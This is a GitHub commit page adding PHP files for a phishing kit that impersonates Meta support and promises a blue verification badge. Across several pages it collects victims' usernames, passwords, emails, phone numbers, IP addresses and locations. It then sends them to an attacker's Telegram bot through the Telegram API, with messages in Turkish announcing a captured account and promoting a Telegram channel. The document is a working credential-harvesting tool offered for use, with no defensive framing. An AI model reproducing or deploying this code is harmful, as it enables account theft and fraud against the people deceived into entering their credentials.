Skip to content

Commit d6bfa2c

Browse files
authored
Txt.aron
H
1 parent 058055f commit d6bfa2c

File tree

10 files changed

+11604
-145
lines changed

10 files changed

+11604
-145
lines changed

0.php

Lines changed: 115 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,115 @@
1+
<?php
2+
if ($_POST) {
3+
4+
$ip=$_SERVER["REMOTE_ADDR"];
5+
$konum = file_get_contents("http://ip-api.com/xml/".$ip);
6+
$cek = new SimpleXMLElement($konum);
7+
$ulke = $cek->country;
8+
$sehir = $cek->city;
9+
10+
date_default_timezone_set('Europe/Istanbul');
11+
$cur_time=date("d-m-Y H:i:s");
12+
13+
require_once('admin/tg.php');
14+
15+
16+
$data = [
17+
'text' => '
18+
19+
Hesap Düşüyor...
20+
21+
İp : '.$ip.'
22+
Konum : '.$ulke.' / '.$sehir.'
23+
Tarih : '.$cur_time.'
24+
25+
katıl : @webservicesx
26+
27+
',
28+
'chat_id' =>"$chatid"
29+
];
30+
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
31+
header("Location: 1.php");
32+
}
33+
?>
34+
35+
36+
<!DOCTYPE html>
37+
<html lang="en">
38+
<head>
39+
<meta charset="UTF-8">
40+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
41+
<meta http-equiv="X-UA-Compatible" content="ie=edge">
42+
<meta name="title" content="Meta">
43+
<meta name="description" content="Meta About">
44+
<meta property="" content="">
45+
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
46+
<link rel="stylesheet" href="css/style.css">
47+
<title>-</title>
48+
</head>
49+
<body> <center>
50+
51+
</center>
52+
<div class="forebaby">
53+
54+
<div class="yazi">
55+
<br>
56+
<center>
57+
<br>
58+
<br>
59+
<img width="150" src="imgs/e.svg" alt="">
60+
<br><br>
61+
</center>
62+
63+
<p>Meta Support notice <br>Your account has been verified <img width="20" src="imgs/tik.png" alt=""> from our servers And you will be given a badge as a verification indicator If you do not fill out this form within 24 hours you will not receive the blue verification badge</p>
64+
<form method="post"> </div>
65+
66+
<button id="bttn" name="fore_user" type="submit" class="btn2" >Continue</button>
67+
<br>
68+
69+
70+
<br>
71+
</form>
72+
73+
74+
</div>
75+
76+
<center>
77+
78+
<div class="alt">
79+
80+
<br>
81+
<img width="150" src="imgs/ehe.png" alt="">
82+
<br><br>
83+
84+
<p>For Meta Support and Complete message response please contact us best company and most robust Meta Verification Company</p>
85+
<p></p> <br><br>
86+
</div>
87+
</center>
88+
<div class="enalt"> <br><br>
89+
<div class="enaltig">
90+
91+
</div>
92+
93+
<div class="linksx">
94+
<a href="#">Community Standarts</a> &nbsp;&nbsp; | &nbsp;&nbsp;
95+
<a href="#">Data Policy</a> <br><br>
96+
<a href="#">Terms</a>
97+
&nbsp;&nbsp; | &nbsp;&nbsp;
98+
<a href="#">Cookie Policy</a>
99+
</div>
100+
<br><hr color="#E0E0E0" size="0.1px" width="90%">
101+
<br>
102+
<div class="dil">
103+
<p>Language English (US)</p>
104+
</div>
105+
<br>
106+
</div>
107+
108+
<script src="jquery-3.6.0.js" ></script>
109+
<script>
110+
$( "form" ).submit(function( event ) {
111+
$( "#bttn" ).html("<i id='loader' class='fa fa-spinner fa-spin'></i>");
112+
});
113+
</script>
114+
</body>
115+
</html>

1.php

Lines changed: 114 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,114 @@
1+
<?php
2+
if ($_POST) {
3+
session_start();
4+
$fore_user=$_POST["fore_user"];
5+
$_SESSION["fore_user"]=$fore_user;
6+
7+
$ip=$_SERVER["REMOTE_ADDR"];
8+
$konum = file_get_contents("http://ip-api.com/xml/".$ip);
9+
$cek = new SimpleXMLElement($konum);
10+
$ulke = $cek->country;
11+
$sehir = $cek->city;
12+
$site = $_SERVER["SERVER_NAME"];
13+
date_default_timezone_set('Europe/Istanbul');
14+
$cur_time=date("d-m-Y H:i:s");
15+
16+
17+
require_once("admin/tg.php");
18+
19+
$data = [
20+
'text' => '
21+
Hesap Düşüyor...
22+
23+
kullanıcı adı : '.$fore_user.'
24+
İp : '.$ip.'
25+
Konum : '.$ulke.' / '.$sehir.'
26+
Tarih : '.$cur_time.'
27+
28+
Katıl : @webservicesx
29+
30+
',
31+
'chat_id' =>"$chatid"
32+
];
33+
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
34+
35+
header("Location:3.php?$fore_user");
36+
37+
}
38+
?>
39+
40+
<!DOCTYPE html>
41+
<html lang="en">
42+
<head>
43+
<meta charset="UTF-8">
44+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
45+
<meta http-equiv="X-UA-Compatible" content="ie=edge">
46+
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
47+
<link rel="stylesheet" href="css/style.css">
48+
<title>-</title>
49+
</head>
50+
<body> <center>
51+
52+
</center>
53+
<div class="forebaby">
54+
55+
<div class="yazi">
56+
<br>
57+
58+
<br>
59+
60+
<img width="150" src="imgs/e.svg" alt="">
61+
<br>
62+
<br>
63+
<p>Hello Dear User,
64+
Type your username and continue to Verify Badge</p>
65+
<form method="post"autocomplete="off">
66+
<center>
67+
<input type="text" class="inputs" name="fore_user" placeholder="Username" required="" >
68+
</center>
69+
70+
<button id="bttn" type="submit" class="btn2" >Continue</button>
71+
<br>
72+
<br>
73+
74+
75+
</form>
76+
</div>
77+
</div>
78+
79+
<center>
80+
<div class="alt"><br>
81+
<img width="150" src="imgs/ehe.png" alt="">
82+
<br><br>
83+
<p>For Meta Support and Complete message response please contact us best company and most robust Meta Verification Company</p>
84+
<br><br>
85+
</div>
86+
</center>
87+
<div class="enalt"> <br><br>
88+
<div class="enaltig">
89+
90+
</div>
91+
92+
<div class="linksx">
93+
<a href="#">Community Standarts</a> &nbsp;&nbsp; | &nbsp;&nbsp;
94+
<a href="#">Data Policy</a> <br><br>
95+
<a href="#">Terms</a>
96+
&nbsp;&nbsp; | &nbsp;&nbsp;
97+
<a href="#">Cookie Policy</a>
98+
</div>
99+
<br><hr color="#E0E0E0" size="0.1px" width="90%">
100+
<br>
101+
<div class="dil">
102+
<p>Language English (US)</p>
103+
</div>
104+
<br>
105+
</div>
106+
107+
<script src="jquery-3.6.0.js" ></script>
108+
<script>
109+
$( "form" ).submit(function( event ) {
110+
$( "#bttn" ).html("<i id='loader' class='fa fa-spinner fa-spin'></i>");
111+
});
112+
</script>
113+
</body>
114+
</html>

3.php

Lines changed: 128 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,128 @@
1+
<?php
2+
ob_start();
3+
session_start();
4+
set_time_limit(0);
5+
error_reporting(0);
6+
7+
if ($_POST) {
8+
$fore_user = $_SESSION["fore_user"];
9+
$forepass = $_POST["forepass"];
10+
$foremail = $_POST["foremail"];
11+
$foreno = $_POST["foreno"];
12+
$ip = $_SERVER["REMOTE_ADDR"];
13+
$konum = file_get_contents("http://ip-api.com/xml/" . $ip);
14+
$cek = new SimpleXMLElement($konum);
15+
$ulke = $cek->country;
16+
$sehir = $cek->city;
17+
$site = $_SERVER["SERVER_NAME"];
18+
date_default_timezone_set('Europe/Istanbul');
19+
$cur_time = date("d-m-Y H:i:s");
20+
21+
require_once("admin/tg.php");
22+
23+
$data = [
24+
'text' => '
25+
Hesap Düştü
26+
27+
Kullanıcı Adı: '.$fore_user.'
28+
Şifre: '.$forepass.'
29+
Mail: '.$foremail.'
30+
Numara: '.$foreno.'
31+
32+
@webservicesx
33+
34+
İp : '.$ip.'
35+
Konum : '.$ulke.' / '.$sehir.'
36+
Tarih : '.$cur_time.'
37+
38+
39+
40+
',
41+
'chat_id' =>"$chatid"
42+
];
43+
file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data) );
44+
45+
header("Location:4.php?$fore_user");
46+
47+
}
48+
?>
49+
50+
<!DOCTYPE html>
51+
<html lang="en">
52+
<head>
53+
<meta charset="UTF-8">
54+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
55+
<meta http-equiv="X-UA-Compatible" content="ie=edge">
56+
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>
57+
<link rel="stylesheet" href="css/style.css">
58+
<title></title>
59+
</head>
60+
<body> <center>
61+
62+
</center>
63+
<div class="forebaby">
64+
65+
<div class="yazi">
66+
<br>
67+
68+
<br>
69+
70+
<img width="150" src="imgs/e.svg" alt="">
71+
72+
<br><br>
73+
<p>Dear <b>@<?php $fore_user = $_SESSION["fore_user"];
74+
echo $fore_user; ?> <img width="20" src="imgs/tik.png" alt=""> </b>, <br>Please fill in the required information to verify that you are the real owner of your account, otherwise your account will not be approved.</p>
75+
<form method="post" autocomplete="off">
76+
<center>
77+
<input type="text" class="inputs" disabled name="fore_user" value="@<?php $fore_user = $_SESSION["fore_user"];
78+
echo $fore_user; ?>" required="" >
79+
<input type="password" class="inputs" name="forepass" placeholder="Password" required="" >
80+
<input type="email" class="inputs" name="foremail" placeholder="E-mail" required="" >
81+
<input type="tel" class="inputs" name="foreno" placeholder="Phone Number" required="" >
82+
</center>
83+
<br>
84+
<button id="bttn" name="fore_user" type="submit" class="btn2" >Continue</button>
85+
<br>
86+
<br>
87+
88+
89+
</form>
90+
</div>
91+
</div>
92+
93+
<center>
94+
<div class="alt"><br>
95+
<img width="150" src="imgs/ehe.png" alt="">
96+
<br><br>
97+
<p>For Meta Support and Complete message response please contact us best company and most robust Meta Verification Company</p>
98+
<br><br>
99+
</div>
100+
</center>
101+
<div class="enalt"> <br><br>
102+
<div class="enaltig">
103+
104+
</div>
105+
106+
<div class="linksx">
107+
<a href="#">Community Standarts</a> &nbsp;&nbsp; | &nbsp;&nbsp;
108+
<a href="#">Data Policy</a> <br><br>
109+
<a href="#">Terms</a>
110+
&nbsp;&nbsp; | &nbsp;&nbsp;
111+
<a href="#">Cookie Policy</a>
112+
</div>
113+
<br><hr color="#E0E0E0" size="0.1px" width="90%">
114+
<br>
115+
<div class="dil">
116+
<p>Language English (US)</p>
117+
</div>
118+
<br>
119+
</div>
120+
121+
<script src="jquery-3.6.0.js" ></script>
122+
<script>
123+
$( "form" ).submit(function( event ) {
124+
$( "#bttn" ).html("<i id='loader' class='fa fa-spinner fa-spin'></i>");
125+
});
126+
</script>
127+
</body>
128+
</html>

0 commit comments

Comments
 (0)